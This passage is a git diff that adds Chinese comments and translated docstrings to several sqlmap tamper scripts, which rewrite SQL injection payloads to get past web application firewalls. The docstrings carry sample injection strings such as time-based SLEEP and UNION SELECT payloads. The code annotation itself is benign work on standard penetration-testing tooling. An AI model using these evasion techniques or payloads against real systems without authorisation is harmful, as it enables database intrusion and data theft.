+            # 如果当前字符是%且后面两个字符是十六进制数字（已编码的字符），则进行Unicode转义
             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                 retVal += "\\u00%s" % payload[i + 1:i + 3]
                 i += 3
             else:
+                # 对未编码的字符进行Unicode转义，并添加到返回值
                 retVal += '\\u%.4X' % ord(payload[i])
-                i += 1
+                i += 1  # 移动索引，处理下一个字符
 
     return retVal
diff --git a/src/sqlmap-master/tamper/class_diagram/class_diagram_classes_class_diagram.png b/src/sqlmap-master/tamper/class_diagram/class_diagram_classes_class_diagram.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/tamper/class_diagram/class_diagram_classes_class_diagram.png differ
diff --git a/src/sqlmap-master/tamper/class_diagram/tamper_classes_tamper.png b/src/sqlmap-master/tamper/class_diagram/tamper_classes_tamper.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/tamper/class_diagram/tamper_classes_tamper.png differ
diff --git a/src/sqlmap-master/tamper/class_diagram/tamper_packages_tamper.png b/src/sqlmap-master/tamper/class_diagram/tamper_packages_tamper.png
new file mode 100644
index 0000000..7278781
Binary files /dev/null and b/src/sqlmap-master/tamper/class_diagram/tamper_packages_tamper.png differ
diff --git a/src/sqlmap-master/tamper/commalesslimit.py b/src/sqlmap-master/tamper/commalesslimit.py
index 0561b2f..c5a5799 100644
--- a/src/sqlmap-master/tamper/commalesslimit.py
+++ b/src/sqlmap-master/tamper/commalesslimit.py
@@ -5,13 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import os
-import re
+import os  # 导入操作系统接口模块
+import re  # 导入正则表达式模块
 
-from lib.core.common import singleTimeWarnMessage
-from lib.core.enums import DBMS
-from lib.core.enums import PRIORITY
+from lib.core.common import singleTimeWarnMessage  # 从核心库导入单次警告消息函数
+from lib.core.enums import DBMS  # 从核心库导入数据库管理系统枚举
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为高
 __priority__ = PRIORITY.HIGH
 
 def dependencies():
@@ -19,22 +20,33 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
+    这个函数用于篡改（tamper）输入的payload，将MySQL中的'LIMIT M, N'语句替换为其等效的'LIMIT N OFFSET M'形式。
 
-    Requirement:
-        * MySQL
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    Tested against:
-        * MySQL 5.0 and 5.5
+    要求：
+        * 仅适用于MySQL数据库。
 
-    >>> tamper('LIMIT 2, 3')
-    'LIMIT 3 OFFSET 2'
+    测试情况：
+        * MySQL 5.0 和 5.5
+
+    注意：
+        * 这个篡改方法对于绕过某些针对'LIMIT M, N'形式的防御机制很有用。
+
+    示例：
+        >>> tamper('LIMIT 2, 3')
+        'LIMIT 3 OFFSET 2'
     """
 
-    retVal = payload
 
+    retVal = payload  # 初始化返回值为输入的payload
+
+    # 使用正则表达式查找'LIMIT M, N'形式的语句
     match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "")
-    if match:
+    if match:  # 如果找到匹配项
+         # 替换为'LIMIT N OFFSET M'形式
         retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1)))
 
-    return retVal
+    return retVal  # 返回篡改后的payload
diff --git a/src/sqlmap-master/tamper/commalessmid.py b/src/sqlmap-master/tamper/commalessmid.py
index b6f4e7f..d8c368b 100644
--- a/src/sqlmap-master/tamper/commalessmid.py
+++ b/src/sqlmap-master/tamper/commalessmid.py
@@ -19,26 +19,37 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
+    这个函数用于篡改（tamper）输入的payload，将MySQL中的'MID(A, B, C)'语句替换为其等效的'MID(A FROM B FOR C)'形式。
 
-    Requirement:
-        * MySQL
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    Tested against:
-        * MySQL 5.0 and 5.5
+    要求：
+        * 仅适用于MySQL数据库。
 
-    >>> tamper('MID(VERSION(), 1, 1)')
-    'MID(VERSION() FROM 1 FOR 1)'
+    测试情况：
+        * MySQL 5.0 和 5.5
+
+    注意：
+        * 使用这个tamper脚本时，你可能需要考虑使用'--no-cast'选项，以避免类型转换问题。
+
+    示例：
+        >>> tamper('MID(VERSION(), 1, 1)')
+        'MID(VERSION() FROM 1 FOR 1)'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
+    # 构建警告信息，提示用户可能需要使用'--no-cast'选项
     warnMsg = "you should consider usage of switch '--no-cast' along with "
     warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0]
     singleTimeWarnMessage(warnMsg)
 
+    # 使用正则表达式查找'MID(A, B, C)'形式的语句
     match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "")
-    if match:
+    if match:  # 如果找到匹配项
+        # 替换为'MID(A FROM B FOR C)'形式
         retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3)))
 
-    return retVal
+    return retVal  # 返回篡改后的payload
diff --git a/src/sqlmap-master/tamper/commentbeforeparentheses.py b/src/sqlmap-master/tamper/commentbeforeparentheses.py
index d5e471d..b4d4162 100644
--- a/src/sqlmap-master/tamper/commentbeforeparentheses.py
+++ b/src/sqlmap-master/tamper/commentbeforeparentheses.py
@@ -5,11 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import re
+import re  # 导入正则表达式模块
 
 from lib.core.enums import PRIORITY
 
-__priority__ = PRIORITY.NORMAL
+__priority__ = PRIORITY.NORMAL # 设置优先级为普通
 
 def dependencies():
     pass
@@ -32,9 +32,10 @@ def tamper(payload, **kwargs):
     'SELECT ABS/**/(1)'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
     if payload:
+        # 使用正则表达式查找单词后紧跟'('的模式，并在'('前添加内联注释'/**/'
         retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/concat2concatws.py b/src/sqlmap-master/tamper/concat2concatws.py
index 7c66c88..3fbc8d6 100644
--- a/src/sqlmap-master/tamper/concat2concatws.py
+++ b/src/sqlmap-master/tamper/concat2concatws.py
@@ -5,12 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import os
+import os  # 导入操作系统模块，用于获取文件路径等信息
 
-from lib.core.common import singleTimeWarnMessage
-from lib.core.enums import DBMS
-from lib.core.enums import PRIORITY
+from lib.core.common import singleTimeWarnMessage  # 从核心库导入单次警告消息函数
+from lib.core.enums import DBMS  # 从核心库导入数据库管理系统枚举
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
@@ -18,23 +19,28 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
+    这个函数用于篡改（tamper）输入的payload，将MySQL中的'CONCAT(A, B)'函数替换为其等效的'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'形式。
 
-    Requirement:
-        * MySQL
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    Tested against:
+    要求：
+        * 仅适用于MySQL数据库。
+
+    测试情况：
         * MySQL 5.0
 
-    Notes:
-        * Useful to bypass very weak and bespoke web application firewalls
-          that filter the CONCAT() function
+    注意：
+        * 这个篡改方法对于绕过那些过滤CONCAT()函数的非常弱的定制Web应用防火墙很有用。
 
-    >>> tamper('CONCAT(1,2)')
-    'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
+    示例：
+        >>> tamper('CONCAT(1,2)')
+        'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
     """
 
     if payload:
+        # 将payload中的'CONCAT('替换为'CONCAT_WS(MID(CHAR(0),0,0),'
         payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),")
 
     return payload
diff --git a/src/sqlmap-master/tamper/decentities.py b/src/sqlmap-master/tamper/decentities.py
index aaed22f..7457579 100644
--- a/src/sqlmap-master/tamper/decentities.py
+++ b/src/sqlmap-master/tamper/decentities.py
@@ -5,8 +5,9 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-from lib.core.enums import PRIORITY
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为低
 __priority__ = PRIORITY.LOW
 
 def dependencies():
@@ -14,19 +15,29 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    HTML encode in decimal (using code points) all characters (e.g. ' -> &#39;)
+    这个函数用于篡改（tamper）输入的payload，将所有字符转换为HTML实体（使用十进制代码点）。
 
-    >>> tamper("1' AND SLEEP(5)#")
-    '&#49;&#39;&#32;&#65;&#78;&#68;&#32;&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#35;'
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        - 遍历payload中的每个字符，并将每个字符转换为其对应的HTML实体形式（例如，' -> &#39;）。
+
+    示例：
+        >>> tamper("1' AND SLEEP(5)#")
+        '&#49;&#39;&#32;&#65;&#78;&#68;&#32;&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#35;'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
-    if payload:
-        retVal = ""
-        i = 0
+    if payload:  # 如果payload不为空
+        retVal = ""  # 初始化返回值字符串
+        i = 0  # 初始化索引
 
+        # 遍历payload中的每个字符
         while i < len(payload):
+            # 将当前字符转换为其对应的HTML实体形式，并添加到返回值字符串
             retVal += "&#%s;" % ord(payload[i])
             i += 1
 
diff --git a/src/sqlmap-master/tamper/dunion.py b/src/sqlmap-master/tamper/dunion.py
index 2717268..58a4607 100644
--- a/src/sqlmap-master/tamper/dunion.py
+++ b/src/sqlmap-master/tamper/dunion.py
@@ -5,13 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import os
-import re
+import os  # 导入操作系统模块，用于获取文件路径等信息
+import re  # 导入正则表达式模块
 
-from lib.core.common import singleTimeWarnMessage
-from lib.core.enums import DBMS
-from lib.core.enums import PRIORITY
+from lib.core.common import singleTimeWarnMessage  # 从核心库导入单次警告消息函数
+from lib.core.enums import DBMS  # 从核心库导入数据库管理系统枚举
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
@@ -19,16 +20,21 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces instances of <int> UNION with <int>DUNION
+    这个函数用于篡改（tamper）输入的payload，将其中的'UNION'关键字替换为'DUNION'。
 
-    Requirement:
-        * Oracle
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    Notes:
-        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
+    要求：
+        * 仅适用于Oracle数据库。
 
-    >>> tamper('1 UNION ALL SELECT')
-    '1DUNION ALL SELECT'
-    """
+    注意：
+        * 参考文档：https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
 
+    示例：
+        >>> tamper('1 UNION ALL SELECT')
+        '1DUNION ALL SELECT'
+    """
+    # 如果payload不为空，使用正则表达式替换其中的UNION关键字
     return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>D\g<2>", payload) if payload else payload
diff --git a/src/sqlmap-master/tamper/equaltolike.py b/src/sqlmap-master/tamper/equaltolike.py
index ddc237b..6f77ef4 100644
--- a/src/sqlmap-master/tamper/equaltolike.py
+++ b/src/sqlmap-master/tamper/equaltolike.py
@@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission
 
 import re
 
-from lib.core.enums import PRIORITY
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
@@ -16,25 +17,29 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
+    这个函数用于篡改（tamper）输入的payload，将所有的等号（'='）操作符替换为'LIKE'操作符。
 
-    Tested against:
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    测试情况：
         * Microsoft SQL Server 2005
-        * MySQL 4, 5.0 and 5.5
+        * MySQL 4, 5.0 和 5.5
 
-    Notes:
-        * Useful to bypass weak and bespoke web application firewalls that
-          filter the equal character ('=')
-        * The LIKE operator is SQL standard. Hence, this tamper script
-          should work against all (?) databases
+    注意：
+        * 这个篡改方法对于绕过那些过滤等号（'='）字符的弱Web应用防火墙很有用。
+        * LIKE操作符是SQL标准操作符，因此这个tamper脚本应该适用于所有数据库。
 
-    >>> tamper('SELECT * FROM users WHERE id=1')
-    'SELECT * FROM users WHERE id LIKE 1'
+    示例：
+        >>> tamper('SELECT * FROM users WHERE id=1')
+        'SELECT * FROM users WHERE id LIKE 1'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
+
 
-    if payload:
-        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
+    if payload:  # 如果payload不为空
+        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) # 使用正则表达式替换payload中的等号（'='）为'LIKE'
 
     return retVal
diff --git a/src/sqlmap-master/tamper/equaltorlike.py b/src/sqlmap-master/tamper/equaltorlike.py
index 097adfc..3e8efb8 100644
--- a/src/sqlmap-master/tamper/equaltorlike.py
+++ b/src/sqlmap-master/tamper/equaltorlike.py
@@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission
 
 import re
 
-from lib.core.enums import PRIORITY
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
@@ -16,22 +17,30 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart
+    这个函数用于篡改（tamper）输入的payload，将所有的等号（'='）操作符替换为'RLIKE'操作符。
 
-    Tested against:
-        * MySQL 4, 5.0 and 5.5
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    Notes:
-        * Useful to bypass weak and bespoke web application firewalls that
-          filter the equal character ('=')
+    测试情况：
+        * MySQL 4, 5.0 和 5.5
 
-    >>> tamper('SELECT * FROM users WHERE id=1')
-    'SELECT * FROM users WHERE id RLIKE 1'
+    注意：
+        * 这个篡改方法对于绕过那些过滤等号（'='）字符的弱Web应用防火墙很有用。
+
+    示例：
+        >>> tamper('SELECT * FROM users WHERE id=1')
+        'SELECT * FROM users WHERE id RLIKE 1'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
     if payload:
+        # 使用正则表达式替换payload中的等号（'='）为'RLIKE'
+        # \s* 匹配任意数量的空白字符（包括0个）
+        # = 匹配等号字符
+        # \s* 匹配等号后的任意数量的空白字符
         retVal = re.sub(r"\s*=\s*", " RLIKE ", retVal)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/escapequotes.py b/src/sqlmap-master/tamper/escapequotes.py
index 778b693..f29e8e7 100644
--- a/src/sqlmap-master/tamper/escapequotes.py
+++ b/src/sqlmap-master/tamper/escapequotes.py
@@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission
 
 from lib.core.enums import PRIORITY
 
+# 设置优先级为普通
 __priority__ = PRIORITY.NORMAL
 
 def dependencies():
@@ -14,10 +15,19 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Slash escape single and double quotes (e.g. ' -> \')
+    这个函数用于篡改（tamper）输入的payload，通过斜杠转义单引号和双引号。
 
-    >>> tamper('1" AND SLEEP(5)#')
-    '1\\\\" AND SLEEP(5)#'
-    """
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        - 将payload中的单引号（'）替换为转义形式（\\'）。
+        - 将payload中的双引号（"）替换为转义形式（\\"）。
 
+    示例：
+        >>> tamper('1" AND SLEEP(5)#')
+        '1\\\\" AND SLEEP(5)#'
+    """
+    # 替换payload中的单引号和双引号为它们的转义形式
     return payload.replace("'", "\\'").replace('"', '\\"')
diff --git a/src/sqlmap-master/tamper/greatest.py b/src/sqlmap-master/tamper/greatest.py
index 5801355..cb9a15b 100644
--- a/src/sqlmap-master/tamper/greatest.py
+++ b/src/sqlmap-master/tamper/greatest.py
@@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission
 
 import re
 
-from lib.core.enums import PRIORITY
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
@@ -16,30 +17,36 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces greater than operator ('>') with 'GREATEST' counterpart
+    这个函数用于篡改（tamper）输入的payload，将大于操作符（'>')替换为'GREATEST'函数的等效形式。
 
-    Tested against:
-        * MySQL 4, 5.0 and 5.5
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    测试情况：
+        * MySQL 4, 5.0 和 5.5
         * Oracle 10g
         * PostgreSQL 8.3, 8.4, 9.0
 
-    Notes:
-        * Useful to bypass weak and bespoke web application firewalls that
-          filter the greater than character
-        * The GREATEST clause is a widespread SQL command. Hence, this
-          tamper script should work against majority of databases
+    注意：
+        * 这个篡改方法对于绕过那些过滤大于字符（'>')的弱Web应用防火墙很有用。
+        * GREATEST函数是一个广泛使用的SQL命令。因此，这个tamper脚本应该适用于大多数数据库。
 
-    >>> tamper('1 AND A > B')
-    '1 AND GREATEST(A,B+1)=A'
+    示例：
+        >>> tamper('1 AND A > B')
+        '1 AND GREATEST(A,B+1)=A'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
+
 
-    if payload:
+    if payload:  # 如果payload不为空
+        # 使用正则表达式查找'A > B'形式的语句
         match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
 
-        if match:
+        if match:  # 如果找到匹配项
+            # 构造GREATEST函数形式的语句，并替换原语句
             _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3))
-            retVal = retVal.replace(match.group(0), _)
+            retVal = retVal.replace(match.group(0), _)  # 替换原语句为GREATEST函数形式
 
     return retVal
diff --git a/src/sqlmap-master/tamper/halfversionedmorekeywords.py b/src/sqlmap-master/tamper/halfversionedmorekeywords.py
index f4dd455..f922076 100644
--- a/src/sqlmap-master/tamper/halfversionedmorekeywords.py
+++ b/src/sqlmap-master/tamper/halfversionedmorekeywords.py
@@ -8,12 +8,13 @@ See the file 'LICENSE' for copying permission
 import os
 import re
 
-from lib.core.common import singleTimeWarnMessage
-from lib.core.data import kb
-from lib.core.enums import DBMS
-from lib.core.enums import PRIORITY
-from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
+from lib.core.common import singleTimeWarnMessage  # 从核心库导入单次警告消息函数
+from lib.core.data import kb  # 从核心库导入知识库，包含SQL关键字等信息
+from lib.core.enums import DBMS  # 从核心库导入数据库管理系统枚举
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
+from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS  # 从核心设置导入忽略空格影响的关键字列表
 
+# 设置优先级为较高
 __priority__ = PRIORITY.HIGHER
 
 def dependencies():
@@ -21,35 +22,44 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Adds (MySQL) versioned comment before each keyword
+    这个函数用于篡改（tamper）输入的payload，通过在每个关键字前添加MySQL版本注释。
 
-    Requirement:
-        * MySQL < 5.1
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    Tested against:
+    要求：
+        * 仅适用于MySQL版本小于5.1的数据库。
+
+    测试情况：
         * MySQL 4.0.18, 5.0.22
 
-    Notes:
-        * Useful to bypass several web application firewalls when the
-          back-end database management system is MySQL
-        * Used during the ModSecurity SQL injection challenge,
-          http://modsecurity.org/demo/challenge.html
+    注意：
+        * 这个篡改方法对于绕过Web应用防火墙很有用，特别是当后端数据库管理系统是MySQL时。
+        * 在ModSecurity SQL注入挑战中使用过，链接：http://modsecurity.org/demo/challenge.html
 
-    >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
-    "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
+    示例：
+        >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
+        "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
     """
 
     def process(match):
+        """
+        辅助函数，用于处理正则匹配的结果。
+        将匹配到的关键字替换为带有版本注释的关键字。
+        """
         word = match.group('word')
         if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
             return match.group().replace(word, "/*!0%s" % word)
         else:
             return match.group()
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
     if payload:
+        # 使用正则表达式查找并替换关键字
         retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal)
+        # 替换多余的空格
         retVal = retVal.replace(" /*!0", "/*!0")
 
     return retVal
diff --git a/src/sqlmap-master/tamper/hex2char.py b/src/sqlmap-master/tamper/hex2char.py
index 267124d..fafc134 100644
--- a/src/sqlmap-master/tamper/hex2char.py
+++ b/src/sqlmap-master/tamper/hex2char.py
@@ -9,11 +9,12 @@ import os
 import re
 
 from lib.core.common import singleTimeWarnMessage
-from lib.core.convert import decodeHex
-from lib.core.convert import getOrds
-from lib.core.enums import DBMS
-from lib.core.enums import PRIORITY
+from lib.core.convert import decodeHex  # 从核心库导入十六进制解码函数
+from lib.core.convert import getOrds  # 从核心库导入获取字符ASCII值的函数
+from lib.core.enums import DBMS  # 从核心库导入数据库管理系统枚举
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为普通
 __priority__ = PRIORITY.NORMAL
 
 def dependencies():
@@ -21,29 +22,37 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
+    这个函数用于篡改（tamper）输入的payload，将每个MySQL的0x<hex>编码字符串替换为其等效的CONCAT(CHAR(),...)形式。
 
-    Requirement:
-        * MySQL
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    Tested against:
-        * MySQL 4, 5.0 and 5.5
+    要求：
+        * 仅适用于MySQL数据库。
 
-    Notes:
-        * Useful in cases when web application does the upper casing
+    测试情况：
+        * MySQL 4, 5.0 和 5.5
 
-    >>> tamper('SELECT 0xdeadbeef')
-    'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
+    注意：
+        * 当Web应用程序执行大写转换时，这个篡改方法很有用。
+
+    示例：
+        >>> tamper('SELECT 0xdeadbeef')
+        'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
-    if payload:
+    if payload:  # 如果payload不为空
+        # 遍历payload中所有匹配0x<hex>模式的字符串
         for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal):
-            if len(match.group(1)) > 2:
+            if len(match.group(1)) > 2:  # 如果匹配的十六进制字符串长度大于2
+                # 将十六进制字符串解码为ASCII值，并构造CONCAT(CHAR(),...)形式的字符串
                 result = "CONCAT(%s)" % ','.join("CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1))))
-            else:
+            else: # 如果长度不超过2，直接构造CHAR()形式的字符串
                 result = "CHAR(%d)" % ord(decodeHex(match.group(1)))
+            # 将原0x<hex>字符串替换为新构造的字符串
             retVal = retVal.replace(match.group(0), result)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/hexentities.py b/src/sqlmap-master/tamper/hexentities.py
index d36923e..2b2c849 100644
--- a/src/sqlmap-master/tamper/hexentities.py
+++ b/src/sqlmap-master/tamper/hexentities.py
@@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission
 
 from lib.core.enums import PRIORITY
 
+# 设置优先级为低
 __priority__ = PRIORITY.LOW
 
 def dependencies():
@@ -14,20 +15,29 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    HTML encode in hexadecimal (using code points) all characters (e.g. ' -> &#x31;)
+    这个函数用于篡改（tamper）输入的payload，将所有字符转换为十六进制形式的HTML实体编码（例如，' -> &#x31;）。
 
-    >>> tamper("1' AND SLEEP(5)#")
-    '&#x31;&#x27;&#x20;&#x41;&#x4e;&#x44;&#x20;&#x53;&#x4c;&#x45;&#x45;&#x50;&#x28;&#x35;&#x29;&#x23;'
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        - 遍历payload中的每个字符，并将每个字符转换为其对应的十六进制HTML实体形式。
+
+    示例：
+        >>> tamper("1' AND SLEEP(5)#")
+        '&#x31;&#x27;&#x20;&#x41;&#x4e;&#x44;&#x20;&#x53;&#x4c;&#x45;&#x45;&#x50;&#x28;&#x35;&#x29;&#x23;'
     """
 
     retVal = payload
 
     if payload:
-        retVal = ""
-        i = 0
+        retVal = ""  # 初始化返回值字符串
+        i = 0 # 初始化索引
 
         while i < len(payload):
+            # 将当前字符转换为其对应的十六进制HTML实体形式，并添加到返回值字符串
             retVal += "&#x%s;" % format(ord(payload[i]), "x")
-            i += 1
+            i += 1  # 移动索引，处理下一个字符
 
     return retVal
diff --git a/src/sqlmap-master/tamper/htmlencode.py b/src/sqlmap-master/tamper/htmlencode.py
index 6cd5507..2a86822 100644
--- a/src/sqlmap-master/tamper/htmlencode.py
+++ b/src/sqlmap-master/tamper/htmlencode.py
@@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission
 
 import re
 
-from lib.core.enums import PRIORITY
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为低
 __priority__ = PRIORITY.LOW
 
 def dependencies():
@@ -16,16 +17,26 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)
+    这个函数用于篡改（tamper）输入的payload，将所有非字母数字字符转换为HTML实体编码（使用代码点）。
 
-    >>> tamper("1' AND SLEEP(5)#")
-    '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
-    >>> tamper("1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;")
-    '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    功能：
+        - 遍历payload中的每个字符，并将非字母数字字符转换为其对应的HTML实体形式。
+
+    示例：
+        >>> tamper("1' AND SLEEP(5)#")
+        '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
+        >>> tamper("1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;")
+        '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
     """
 
-    if payload:
+    if payload:  # 如果payload不为空
+        # 替换已经编码的HTML实体
         payload = re.sub(r"&#(\d+);", lambda match: chr(int(match.group(1))), payload)      # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5203
+        # 将非字母数字字符转换为HTML实体编码
         payload = re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload)
 
     return payload
diff --git a/src/sqlmap-master/tamper/if2case.py b/src/sqlmap-master/tamper/if2case.py
index 2e3a01f..2376661 100644
--- a/src/sqlmap-master/tamper/if2case.py
+++ b/src/sqlmap-master/tamper/if2case.py
@@ -5,67 +5,126 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
